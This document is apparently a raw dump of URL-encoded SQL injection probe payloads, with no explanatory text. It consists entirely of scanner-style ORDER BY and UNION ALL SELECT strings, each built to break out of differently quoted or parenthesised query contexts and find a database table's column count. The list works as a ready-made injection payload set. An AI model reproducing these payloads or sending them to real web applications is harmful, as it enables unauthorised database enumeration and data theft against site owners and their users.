-4137%27%29%29%20UNION%20ALL%20SELECT%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720%2C%204720--%20%20AND%20%28%28%27mLPs%27%3D%27mLPs -4791%27%29%29%20UNION%20ALL%20SELECT%205444%2C%205444%2C%205444%2C%205444%2C%205444%2C%205444%2C%205444%2C%205444%2C%205444%2C%205444--%20%20AND%20%28%28%27GpVd%27%3D%27GpVd -6408%27%29%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%28%27wOXj%27%3D%27wOXj -1976%27%29%29%29%20ORDER%20BY%205283--%20%20AND%20%28%28%28%27DElt%27%3D%27DElt -3844%27%29%29%29%20UNION%20ALL%20SELECT%205030--%20%20AND%20%28%28%28%27KKdl%27%3D%27KKdl -2404%27%29%29%29%20UNION%20ALL%20SELECT%203038%2C%203038--%20%20AND%20%28%28%28%27fSlO%27%3D%27fSlO -3424%27%29%29%29%20UNION%20ALL%20SELECT%208807%2C%208807%2C%208807--%20%20AND%20%28%28%28%27gcPV%27%3D%27gcPV -5622%27%29%29%29%20UNION%20ALL%20SELECT%203750%2C%203750%2C%203750%2C%203750--%20%20AND%20%28%28%28%27SFBV%27%3D%27SFBV -8577%27%29%29%29%20UNION%20ALL%20SELECT%209558%2C%209558%2C%209558%2C%209558%2C%209558--%20%20AND%20%28%28%28%27gbXV%27%3D%27gbXV -2370%27%29%29%29%20UNION%20ALL%20SELECT%206693%2C%206693%2C%206693%2C%206693%2C%206693%2C%206693--%20%20AND%20%28%28%28%27dmXB%27%3D%27dmXB -8990%27%29%29%29%20UNION%20ALL%20SELECT%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776--%20%20AND%20%28%28%28%27XaVK%27%3D%27XaVK -8291%27%29%29%29%20UNION%20ALL%20SELECT%204559%2C%204559%2C%204559%2C%204559%2C%204559%2C%204559%2C%204559%2C%204559--%20%20AND%20%28%28%28%27UhfG%27%3D%27UhfG -6717%27%29%29%29%20UNION%20ALL%20SELECT%208360%2C%208360%2C%208360%2C%208360%2C%208360%2C%208360%2C%208360%2C%208360%2C%208360--%20%20AND%20%28%28%28%27lEWH%27%3D%27lEWH -9969%27%29%29%29%20UNION%20ALL%20SELECT%208402%2C%208402%2C%208402%2C%208402%2C%208402%2C%208402%2C%208402%2C%208402%2C%208402%2C%208402--%20%20AND%20%28%28%28%27rnIF%27%3D%27rnIF -9494%27%20ORDER%20BY%201--%20%20AND%20%27tkvD%27%3D%27tkvD -5167%27%20ORDER%20BY%207366--%20%20AND%20%27kiLs%27%3D%27kiLs -9385%27%20UNION%20ALL%20SELECT%205009--%20%20AND%20%27wLTO%27%3D%27wLTO -2993%27%20UNION%20ALL%20SELECT%209565%2C%209565--%20%20AND%20%27KoUo%27%3D%27KoUo -3305%27%20UNION%20ALL%20SELECT%202247%2C%202247%2C%202247--%20%20AND%20%27RGql%27%3D%27RGql -1463%27%20UNION%20ALL%20SELECT%204165%2C%204165%2C%204165%2C%204165--%20%20AND%20%27tYDD%27%3D%27tYDD -9655%27%20UNION%20ALL%20SELECT%208019%2C%208019%2C%208019%2C%208019%2C%208019--%20%20AND%20%27YWpZ%27%3D%27YWpZ -7641%27%20UNION%20ALL%20SELECT%204911%2C%204911%2C%204911%2C%204911%2C%204911%2C%204911--%20%20AND%20%27KtxK%27%3D%27KtxK -9498%27%20UNION%20ALL%20SELECT%204077%2C%204077%2C%204077%2C%204077%2C%204077%2C%204077%2C%204077--%20%20AND%20%27LRoE%27%3D%27LRoE -8459%27%20UNION%20ALL%20SELECT%208197%2C%208197%2C%208197%2C%208197%2C%208197%2C%208197%2C%208197%2C%208197--%20%20AND%20%27sIYw%27%3D%27sIYw -2060%27%20UNION%20ALL%20SELECT%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944--%20%20AND%20%27euFC%27%3D%27euFC -4514%27%20UNION%20ALL%20SELECT%208564%2C%208564%2C%208564%2C%208564%2C%208564%2C%208564%2C%208564%2C%208564%2C%208564%2C%208564--%20%20AND%20%27Tila%27%3D%27Tila -5332%27%29%20ORDER%20BY%201--%20%20AND%20%28%27UlkH%27%20LIKE%20%27UlkH -6355%27%29%20ORDER%20BY%205516--%20%20AND%20%28%27LkhW%27%20LIKE%20%27LkhW -3380%27%29%20UNION%20ALL%20SELECT%206252--%20%20AND%20%28%27QOLU%27%20LIKE%20%27QOLU -9534%27%29%20UNION%20ALL%20SELECT%205145%2C%205145--%20%20AND%20%28%27CKqm%27%20LIKE%20%27CKqm -5115%27%29%20UNION%20ALL%20SELECT%205464%2C%205464%2C%205464--%20%20AND%20%28%27kVZF%27%20LIKE%20%27kVZF -2204%27%29%20UNION%20ALL%20SELECT%202570%2C%202570%2C%202570%2C%202570--%20%20AND%20%28%27zuLX%27%20LIKE%20%27zuLX -2252%27%29%20UNION%20ALL%20SELECT%206703%2C%206703%2C%206703%2C%206703%2C%206703--%20%20AND%20%28%27uNOc%27%20LIKE%20%27uNOc -3447%27%29%20UNION%20ALL%20SELECT%209118%2C%209118%2C%209118%2C%209118%2C%209118%2C%209118--%20%20AND%20%28%27tpAi%27%20LIKE%20%27tpAi -9998%27%29%20UNION%20ALL%20SELECT%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059%2C%204059--%20%20AND%20%28%27kBdt%27%20LIKE%20%27kBdt -8782%27%29%20UNION%20ALL%20SELECT%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590%2C%203590--%20%20AND%20%28%27aAkF%27%20LIKE%20%27aAkF -7784%27%29%20UNION%20ALL%20SELECT%204937%2C%204937%2C%204937%2C%204937%2C%204937%2C%204937%2C%204937%2C%204937%2C%204937--%20%20AND%20%28%27rzDx%27%20LIKE%20%27rzDx -1267%27%29%20UNION%20ALL%20SELECT%202361%2C%202361%2C%202361%2C%202361%2C%202361%2C%202361%2C%202361%2C%202361%2C%202361%2C%202361--%20%20AND%20%28%27cxCY%27%20LIKE%20%27cxCY -8737%27%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%27YgQh%27%20LIKE%20%27YgQh -1520%27%29%29%20ORDER%20BY%202810--%20%20AND%20%28%28%27LaEY%27%20LIKE%20%27LaEY -8584%27%29%29%20UNION%20ALL%20SELECT%203731--%20%20AND%20%28%28%27QbzX%27%20LIKE%20%27QbzX -5916%27%29%29%20UNION%20ALL%20SELECT%205876%2C%205876--%20%20AND%20%28%28%27iOif%27%20LIKE%20%27iOif -8722%27%29%29%20UNION%20ALL%20SELECT%203337%2C%203337%2C%203337--%20%20AND%20%28%28%27fesL%27%20LIKE%20%27fesL -1077%27%29%29%20UNION%20ALL%20SELECT%206127%2C%206127%2C%206127%2C%206127--%20%20AND%20%28%28%27vcvz%27%20LIKE%20%27vcvz -8565%27%29%29%20UNION%20ALL%20SELECT%201749%2C%201749%2C%201749%2C%201749%2C%201749--%20%20AND%20%28%28%27vvcZ%27%20LIKE%20%27vvcZ -5555%27%29%29%20UNION%20ALL%20SELECT%201083%2C%201083%2C%201083%2C%201083%2C%201083%2C%201083--%20%20AND%20%28%28%27rTsn%27%20LIKE%20%27rTsn -4066%27%29%29%20UNION%20ALL%20SELECT%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893--%20%20AND%20%28%28%27fubR%27%20LIKE%20%27fubR -1348%27%29%29%20UNION%20ALL%20SELECT%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455%2C%201455--%20%20AND%20%28%28%27njfF%27%20LIKE%20%27njfF -5377%27%29%29%20UNION%20ALL%20SELECT%201408%2C%201408%2C%201408%2C%201408%2C%201408%2C%201408%2C%201408%2C%201408%2C%201408--%20%20AND%20%28%28%27iMmE%27%20LIKE%20%27iMmE -8615%27%29%29%20UNION%20ALL%20SELECT%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474--%20%20AND%20%28%28%27YAtc%27%20LIKE%20%27YAtc -4320%27%29%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%28%27hsha%27%20LIKE%20%27hsha -1052%27%29%29%29%20ORDER%20BY%204502--%20%20AND%20%28%28%28%27AlFk%27%20LIKE%20%27AlFk -2470%27%29%29%29%20UNION%20ALL%20SELECT%204889--%20%20AND%20%28%28%28%27DzzF%27%20LIKE%20%27DzzF -6294%27%29%29%29%20UNION%20ALL%20SELECT%202483%2C%202483--%20%20AND%20%28%28%28%27qZZj%27%20LIKE%20%27qZZj -2839%27%29%29%29%20UNION%20ALL%20SELECT%209629%2C%209629%2C%209629--%20%20AND%20%28%28%28%27ZKFO%27%20LIKE%20%27ZKFO -6795%27%29%29%29%20UNION%20ALL%20SELECT%202854%2C%202854%2C%202854%2C%202854--%20%20AND%20%28%28%28%27BxQj%27%20LIKE%20%27BxQj -8764%27%29%29%29%20UNION%20ALL%20SELECT%202228%2C%202228%2C%202228%2C%202228%2C%202228--%20%20AND%20%28%28%28%27jWwF%27%20LIKE%20%27jWwF -6363%27%29%29%29%20UNION%20ALL%20SELECT%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552--%20%20AND%20%28%28%28%27hdKb%27%20LIKE%20%27hdKb -3715%27%29%29%29%20UNION%20ALL%20SELECT%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218%2C%202218--%20%20AND%20%28%28%28%27NZpm%27%20LIKE%20%27NZpm -4899%27%29%29%29%20UNION%20ALL%20SELECT%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413%2C%207413--%20%20AND%20%28%28%28%27bqQj%27%20LIKE%20%27bqQj -3151%27%29%29%29%20UNION%20ALL%20SELECT%209586%2C%209586%2C%209586%2C%209586%2C%209586%2C%209586%2C%209586%2C%209586%2C%209586--%20%20AND%20%28%28%28%27rLlj%27%20LIKE%20%27rLlj -3127%27%29%29%29%20UNION%20ALL%20SELECT%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275--%20%20AND%20%28%28%28%27lXix%27%20LIKE%20%27lXix -9129%27%20ORDER%20BY%201--%20%20AND%20%27wGTW%27%20LIKE%20%27wGTW -1122%27%20ORDER%20BY%202844--%20%20AND%20%27eCTH%27%20LIKE%20%27eCTH -3965%27%20UNION%20ALL%20SELECT%208061--%20%20AND%20%27QcQs%27%20LIKE%20%27QcQs -4573%27%20UNION%20ALL%20SELECT%202628%2C%202628--%20%20AND%20%27RJVg%27%20LIKE%20%27RJVg -9724%27%20UNION%20ALL%20SELECT%208772%2C%208772%2C%208772--%20%20AND%20%27HvUn%27%20LIKE%20%27HvUn -6448%27%20UNION%20ALL%20SELECT%201399%2C%201399%2C%201399%2C%201399--%20%20AND%20%27vJjw%27%20LIKE%20%27vJjw -2376%27%20UNION%20ALL%20SELECT%209795%2C%209795%2C%209795%2C%209795%2C%209795--%20%20AND%20%27gOCR%27%20LIKE%20%27gOCR -8608%27%20UNION%20ALL%20SELECT%202685%2C%202685%2C%202685%2C%202685%2C%202685%2C%202685--%20%20AND%20%27ozQu%27%20LIKE%20%27ozQu -5341%27%20UNION%20ALL%20SELECT%201690%2C%201690%2C%201690%2C%201690%2C%201690%2C%201690%2C%201690--%20%20AND%20%27Igoe%27%20LIKE%20%27Igoe -3985%27%20UNION%20ALL%20SELECT%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537%2C%201537--%20%20AND%20%27nFoK%27%20LIKE%20%27nFoK -5809%27%20UNION%20ALL%20SELECT%207627%2C%207627%2C%207627%2C%207627%2C%207627%2C%207627%2C%207627%2C%207627%2C%207627--%20%20AND%20%27VqqI%27%20LIKE%20%27VqqI -2522%27%20UNION%20ALL%20SELECT%204842%2C%204842%2C%204842%2C%204842%2C%204842%2C%204842%2C%204842%2C%204842%2C%204842%2C%204842--%20%20AND%20%27ZSNj%27%20LIKE%20%27ZSNj -8196%22%29%20ORDER%20BY%201--%20%20AND%20%28%22OznR%22%3D%22OznR -3632%22%29%20ORDER%20BY%208229--%20%20AND%20%28%22kHeS%22%3D%22kHeS -7906%22%29%20UNION%20ALL%20SELECT%202518--%20%20AND%20%28%22nsvD%22%3D%22nsvD -9086%22%29%20UNION%20ALL%20SELECT%202094%2C%202094--%20%20AND%20%28%22PUol%22%3D%22PUol -6520%22%29%20UNION%20ALL%20SELECT%202601%2C%202601%2C%202601--%20%20AND%20%28%22Eavr%22%3D%22Eavr -9225%22%29%20UNION%20ALL%20SELECT%205664%2C%205664%2C%205664%2C%205664--%20%20AND%20%28%22KObJ%22%3D%22KObJ -8974%22%29%20UNION%20ALL%20SELECT%208944%2C%208944%2C%208944%2C%208944%2C%208944--%20%20AND%20%28%22WczX%22%3D%22WczX -6145%22%29%20UNION%20ALL%20SELECT%202972%2C%202972%2C%202972%2C%202972%2C%202972%2C%202972--%20%20AND%20%28%22kRoN%22%3D%22kRoN -9481%22%29%20UNION%20ALL%20SELECT%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769--%20%20AND%20%28%22CaZq%22%3D%22CaZq -7556%22%29%20UNION%20ALL%20SELECT%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842--%20%20AND%20%28%22orKL%22%3D%22orKL -9867%22%29%20UNION%20ALL%20SELECT%207077%2C%207077%2C%207077%2C%207077%2C%207077%2C%207077%2C%207077%2C%207077%2C%207077--%20%20AND%20%28%22lgBm%22%3D%22lgBm -3743%22%29%20UNION%20ALL%20SELECT%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870%2C%207870--%20%20AND%20%28%22EdcS%22%3D%22EdcS -8099%22%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%22lKGq%22%3D%22lKGq -4819%22%29%29%20ORDER%20BY%209688--%20%20AND%20%28%28%22zECv%22%3D%22zECv -7119%22%29%29%20UNION%20ALL%20SELECT%201266--%20%20AND%20%28%28%22RqAx%22%3D%22RqAx -6439%22%29%29%20UNION%20ALL%20SELECT%205347%2C%205347--%20%20AND%20%28%28%22Euvi%22%3D%22Euvi -6336%22%29%29%20UNION%20ALL%20SELECT%203012%2C%203012%2C%203012--%20%20AND%20%28%28%22keTb%22%3D%22keTb -2661%22%29%29%20UNION%20ALL%20SELECT%206454%2C%206454%2C%206454%2C%206454--%20%20AND%20%28%28%22ykKw%22%3D%22ykKw -1996%22%29%29%20UNION%20ALL%20SELECT%207697%2C%207697%2C%207697%2C%207697%2C%207697--%20%20AND%20%28%28%22qAHv%22%3D%22qAHv -8628%22%29%29%20UNION%20ALL%20SELECT%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311--%20%20AND%20%28%28%22JuTJ%22%3D%22JuTJ -7584%22%29%29%20UNION%20ALL%20SELECT%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063%2C%207063--%20%20AND%20%28%28%22YFEC%22%3D%22YFEC -5289%22%29%29%20UNION%20ALL%20SELECT%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195%2C%209195--%20%20AND%20%28%28%22zoUf%22%3D%22zoUf -3153%22%29%29%20UNION%20ALL%20SELECT%202757%2C%202757%2C%202757%2C%202757%2C%202757%2C%202757%2C%202757%2C%202757%2C%202757--%20%20AND%20%28%28%22VGVC%22%3D%22VGVC -4673%22%29%29%20UNION%20ALL%20SELECT%208484%2C%208484%2C%208484%2C%208484%2C%208484%2C%208484%2C%208484%2C%208484%2C%208484%2C%208484--%20%20AND%20%28%28%22uolf%22%3D%22uolf -3273%22%29%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%28%22rqDb%22%3D%22rqDb -9049%22%29%29%29%20ORDER%20BY%209960--%20%20AND%20%28%28%28%22LVVl%22%3D%22LVVl -1194%22%29%29%29%20UNION%20ALL%20SELECT%206996--%20%20AND%20%28%28%28%22rskn%22%3D%22rskn -4102%22%29%29%29%20UNION%20ALL%20SELECT%202279%2C%202279--%20%20AND%20%28%28%28%22Tzrp%22%3D%22Tzrp -4541%22%29%29%29%20UNION%20ALL%20SELECT%207741%2C%207741%2C%207741--%20%20AND%20%28%28%28%22NqlW%22%3D%22NqlW -1866%22%29%29%29%20UNION%20ALL%20SELECT%209937%2C%209937%2C%209937%2C%209937--%20%20AND%20%28%28%28%22NAbq%22%3D%22NAbq -4614%22%29%29%29%20UNION%20ALL%20SELECT%209549%2C%209549%2C%209549%2C%209549%2C%209549--%20%20AND%20%28%28%28%22pKlS%22%3D%22pKlS -8927%22%29%29%29%20UNION%20ALL%20SELECT%209102%2C%209102%2C%209102%2C%209102%2C%209102%2C%209102--%20%20AND%20%28%28%28%22ETvJ%22%3D%22ETvJ -2376%22%29%29%29%20UNION%20ALL%20SELECT%208659%2C%208659%2C%208659%2C%208659%2C%208659%2C%208659%2C%208659--%20%20AND%20%28%28%28%22tbRr%22%3D%22tbRr -7828%22%29%29%29%20UNION%20ALL%20SELECT%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128--%20%20AND%20%28%28%28%22wCTO%22%3D%22wCTO -7903%22%29%29%29%20UNION%20ALL%20SELECT%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740%2C%201740--%20%20AND%20%28%28%28%22kTUp%22%3D%22kTUp -7888%22%29%29%29%20UNION%20ALL%20SELECT%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772--%20%20AND%20%28%28%28%22IWqd%22%3D%22IWqd -1335%22%20ORDER%20BY%201--%20%20AND%20%22FNwZ%22%3D%22FNwZ -6928%22%20ORDER%20BY%206613--%20%20AND%20%22CWzs%22%3D%22CWzs -3774%22%20UNION%20ALL%20SELECT%204609--%20%20AND%20%22KsSt%22%3D%22KsSt -3306%22%20UNION%20ALL%20SELECT%201951%2C%201951--%20%20AND%20%22pTmL%22%3D%22pTmL -8268%22%20UNION%20ALL%20SELECT%202867%2C%202867%2C%202867--%20%20AND%20%22siMt%22%3D%22siMt -6655%22%20UNION%20ALL%20SELECT%206725%2C%206725%2C%206725%2C%206725--%20%20AND%20%22dxuO%22%3D%22dxuO -9214%22%20UNION%20ALL%20SELECT%206828%2C%206828%2C%206828%2C%206828%2C%206828--%20%20AND%20%22CXLh%22%3D%22CXLh -4162%22%20UNION%20ALL%20SELECT%203810%2C%203810%2C%203810%2C%203810%2C%203810%2C%203810--%20%20AND%20%22hcsH%22%3D%22hcsH -5617%22%20UNION%20ALL%20SELECT%201908%2C%201908%2C%201908%2C%201908%2C%201908%2C%201908%2C%201908--%20%20AND%20%22yiKL%22%3D%22yiKL -8395%22%20UNION%20ALL%20SELECT%206931%2C%206931%2C%206931%2C%206931%2C%206931%2C%206931%2C%206931%2C%206931--%20%20AND%20%22ekeZ%22%3D%22ekeZ -8205%22%20UNION%20ALL%20SELECT%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135--%20%20AND%20%22JGJq%22%3D%22JGJq -3451%22%20UNION%20ALL%20SELECT%204281%2C%204281%2C%204281%2C%204281%2C%204281%2C%204281%2C%204281%2C%204281%2C%204281%2C%204281--%20%20AND%20%22KSrg%22%3D%22KSrg -5416%22%29%20ORDER%20BY%201--%20%20AND%20%28%22UZyh%22%20LIKE%20%22UZyh -6269%22%29%20ORDER%20BY%202366--%20%20AND%20%28%22iJCx%22%20LIKE%20%22iJCx -3109%22%29%20UNION%20ALL%20SELECT%206240--%20%20AND%20%28%22TAib%22%20LIKE%20%22TAib -3521%22%29%20UNION%20ALL%20SELECT%207887%2C%207887--%20%20AND%20%28%22bdMX%22%20LIKE%20%22bdMX -7749%22%29%20UNION%20ALL%20SELECT%206733%2C%206733%2C%206733--%20%20AND%20%28%22EvTd%22%20LIKE%20%22EvTd -5345%22%29%20UNION%20ALL%20SELECT%209165%2C%209165%2C%209165%2C%209165--%20%20AND%20%28%22HTVg%22%20LIKE%20%22HTVg -2914%22%29%20UNION%20ALL%20SELECT%209857%2C%209857%2C%209857%2C%209857%2C%209857--%20%20AND%20%28%22rHnt%22%20LIKE%20%22rHnt -9640%22%29%20UNION%20ALL%20SELECT%206948%2C%206948%2C%206948%2C%206948%2C%206948%2C%206948--%20%20AND%20%28%22PLSh%22%20LIKE%20%22PLSh -2454%22%29%20UNION%20ALL%20SELECT%208702%2C%208702%2C%208702%2C%208702%2C%208702%2C%208702%2C%208702--%20%20AND%20%28%22jBIi%22%20LIKE%20%22jBIi -1760%22%29%20UNION%20ALL%20SELECT%209886%2C%209886%2C%209886%2C%209886%2C%209886%2C%209886%2C%209886%2C%209886--%20%20AND%20%28%22tfXn%22%20LIKE%20%22tfXn -9565%22%29%20UNION%20ALL%20SELECT%201402%2C%201402%2C%201402%2C%201402%2C%201402%2C%201402%2C%201402%2C%201402%2C%201402--%20%20AND%20%28%22FPGA%22%20LIKE%20%22FPGA -9728%22%29%20UNION%20ALL%20SELECT%208505%2C%208505%2C%208505%2C%208505%2C%208505%2C%208505%2C%208505%2C%208505%2C%208505%2C%208505--%20%20AND%20%28%22sNtl%22%20LIKE%20%22sNtl -4398%22%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%22zgEf%22%20LIKE%20%22zgEf -1534%22%29%29%20ORDER%20BY%202839--%20%20AND%20%28%28%22nBFc%22%20LIKE%20%22nBFc -2697%22%29%29%20UNION%20ALL%20SELECT%202250--%20%20AND%20%28%28%22cdqD%22%20LIKE%20%22cdqD -3144%22%29%29%20UNION%20ALL%20SELECT%205564%2C%205564--%20%20AND%20%28%28%22mgZX%22%20LIKE%20%22mgZX -1982%22%29%29%20UNION%20ALL%20SELECT%209850%2C%209850%2C%209850--%20%20AND%20%28%28%22fRVo%22%20LIKE%20%22fRVo -9525%22%29%29%20UNION%20ALL%20SELECT%203129%2C%203129%2C%203129%2C%203129--%20%20AND%20%28%28%22zFZe%22%20LIKE%20%22zFZe -3460%22%29%29%20UNION%20ALL%20SELECT%206579%2C%206579%2C%206579%2C%206579%2C%206579--%20%20AND%20%28%28%22Djrc%22%20LIKE%20%22Djrc -3484%22%29%29%20UNION%20ALL%20SELECT%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634--%20%20AND%20%28%28%22ruDX%22%20LIKE%20%22ruDX -6183%22%29%29%20UNION%20ALL%20SELECT%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978--%20%20AND%20%28%28%22klcF%22%20LIKE%20%22klcF -4037%22%29%29%20UNION%20ALL%20SELECT%202118%2C%202118%2C%202118%2C%202118%2C%202118%2C%202118%2C%202118%2C%202118--%20%20AND%20%28%28%22hJGJ%22%20LIKE%20%22hJGJ -1563%22%29%29%20UNION%20ALL%20SELECT%206214%2C%206214%2C%206214%2C%206214%2C%206214%2C%206214%2C%206214%2C%206214%2C%206214--%20%20AND%20%28%28%22vUVe%22%20LIKE%20%22vUVe -6904%22%29%29%20UNION%20ALL%20SELECT%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196%2C%203196--%20%20AND%20%28%28%22wPWt%22%20LIKE%20%22wPWt -4722%22%29%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%28%22aUPE%22%20LIKE%20%22aUPE -7819%22%29%29%29%20ORDER%20BY%207094--%20%20AND%20%28%28%28%22AUaT%22%20LIKE%20%22AUaT -4012%22%29%29%29%20UNION%20ALL%20SELECT%202851--%20%20AND%20%28%28%28%22jybX%22%20LIKE%20%22jybX -8703%22%29%29%29%20UNION%20ALL%20SELECT%201765%2C%201765--%20%20AND%20%28%28%28%22fUDZ%22%20LIKE%20%22fUDZ -1122%22%29%29%29%20UNION%20ALL%20SELECT%209556%2C%209556%2C%209556--%20%20AND%20%28%28%28%22aOhd%22%20LIKE%20%22aOhd -9868%22%29%29%29%20UNION%20ALL%20SELECT%202271%2C%202271%2C%202271%2C%202271--%20%20AND%20%28%28%28%22WnIj%22%20LIKE%20%22WnIj -8788%22%29%29%29%20UNION%20ALL%20SELECT%203532%2C%203532%2C%203532%2C%203532%2C%203532--%20%20AND%20%28%28%28%22wWys%22%20LIKE%20%22wWys -3620%22%29%29%29%20UNION%20ALL%20SELECT%207909%2C%207909%2C%207909%2C%207909%2C%207909%2C%207909--%20%20AND%20%28%28%28%22LcBi%22%20LIKE%20%22LcBi -1836%22%29%29%29%20UNION%20ALL%20SELECT%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582%2C%207582--%20%20AND%20%28%28%28%22UAQP%22%20LIKE%20%22UAQP -3952%22%29%29%29%20UNION%20ALL%20SELECT%203814%2C%203814%2C%203814%2C%203814%2C%203814%2C%203814%2C%203814%2C%203814--%20%20AND%20%28%28%28%22eMoY%22%20LIKE%20%22eMoY -4336%22%29%29%29%20UNION%20ALL%20SELECT%208253%2C%208253%2C%208253%2C%208253%2C%208253%2C%208253%2C%208253%2C%208253%2C%208253--%20%20AND%20%28%28%28%22CjOq%22%20LIKE%20%22CjOq -5122%22%29%29%29%20UNION%20ALL%20SELECT%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676%2C%201676--%20%20AND%20%28%28%28%22RLmC%22%20LIKE%20%22RLmC -6509%22%20ORDER%20BY%201--%20%20AND%20%22fBta%22%20LIKE%20%22fBta -9882%22%20ORDER%20BY%201877--%20%20AND%20%22DbDe%22%20LIKE%20%22DbDe -1313%22%20UNION%20ALL%20SELECT%207011--%20%20AND%20%22eIsG%22%20LIKE%20%22eIsG -1595%22%20UNION%20ALL%20SELECT%203215%2C%203215--%20%20AND%20%22DZnY%22%20LIKE%20%22DZnY -5811%22%20UNION%20ALL%20SELECT%208764%2C%208764%2C%208764--%20%20AND%20%22lBWG%22%20LIKE%20%22lBWG -4924%22%20UNION%20ALL%20SELECT%209966%2C%209966%2C%209966%2C%209966--%20%20AND%20%22JhkS%22%20LIKE%20%22JhkS -4599%22%20UNION%20ALL%20SELECT%204379%2C%204379%2C%204379%2C%204379%2C%204379--%20%20AND%20%22oStI%22%20LIKE%20%22oStI -1511%22%20UNION%20ALL%20SELECT%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605--%20%20AND%20%22cTyV%22%20LIKE%20%22cTyV -6312%22%20UNION%20ALL%20SELECT%209422%2C%209422%2C%209422%2C%209422%2C%209422%2C%209422%2C%209422--%20%20AND%20%22IPEC%22%20LIKE%20%22IPEC -3647%22%20UNION%20ALL%20SELECT%207533%2C%207533%2C%207533%2C%207533%2C%207533%2C%207533%2C%207533%2C%207533--%20%20AND%20%22nGeA%22%20LIKE%20%22nGeA -6994%22%20UNION%20ALL%20SELECT%202478%2C%202478%2C%202478%2C%202478%2C%202478%2C%202478%2C%202478%2C%202478%2C%202478--%20%20AND%20%22xchz%22%20LIKE%20%22xchz -4732%22%20UNION%20ALL%20SELECT%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170--%20%20AND%20%22rBHc%22%20LIKE%20%22rBHc -8762%29%20WHERE%206566%3D6566%20ORDER%20BY%201--%20 -1169%29%20WHERE%204597%3D4597%20ORDER%20BY%208280--%20 -9804%29%20WHERE%206261%3D6261%20UNION%20ALL%20SELECT%206261--%20 -7735%29%20WHERE%203891%3D3891%20UNION%20ALL%20SELECT%203891%2C%203891--%20 -9111%29%20WHERE%204373%3D4373%20UNION%20ALL%20SELECT%204373%2C%204373%2C%204373--%20 -8611%29%20WHERE%201587%3D1587%20UNION%20ALL%20SELECT%201587%2C%201587%2C%201587%2C%201587--%20 -2437%29%20WHERE%205469%3D5469%20UNION%20ALL%20SELECT%205469%2C%205469%2C%205469%2C%205469%2C%205469--%20 -2619%29%20WHERE%202431%3D2431%20UNION%20ALL%20SELECT%202431%2C%202431%2C%202431%2C%202431%2C%202431%2C%202431--%20 -9556%29%20WHERE%203325%3D3325%20UNION%20ALL%20SELECT%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325--%20 -6807%29%20WHERE%204432%3D4432%20UNION%20ALL%20SELECT%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432--%20 -4512%29%20WHERE%206449%3D6449%20UNION%20ALL%20SELECT%206449%2C%206449%2C%206449%2C%206449%2C%206449%2C%206449%2C%206449%2C%206449%2C%206449--%20 -9510%29%20WHERE%201910%3D1910%20UNION%20ALL%20SELECT%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910%2C%201910--%20 -1284%27%29%20WHERE%207365%3D7365%20ORDER%20BY%201--%20 -4240%27%29%20WHERE%202956%3D2956%20ORDER%20BY%204610--%20 -7023%27%29%20WHERE%208254%3D8254%20UNION%20ALL%20SELECT%208254--%20 -6670%27%29%20WHERE%202547%3D2547%20UNION%20ALL%20SELECT%202547%2C%202547--%20 -3758%27%29%20WHERE%205635%3D5635%20UNION%20ALL%20SELECT%205635%2C%205635%2C%205635--%20 -6223%27%29%20WHERE%209716%3D9716%20UNION%20ALL%20SELECT%209716%2C%209716%2C%209716%2C%209716--%20 -3531%27%29%20WHERE%204861%3D4861%20UNION%20ALL%20SELECT%204861%2C%204861%2C%204861%2C%204861%2C%204861--%20 -5510%27%29%20WHERE%208447%3D8447%20UNION%20ALL%20SELECT%208447%2C%208447%2C%208447%2C%208447%2C%208447%2C%208447--%20 -9453%27%29%20WHERE%203404%3D3404%20UNION%20ALL%20SELECT%203404%2C%203404%2C%203404%2C%203404%2C%203404%2C%203404%2C%203404--%20 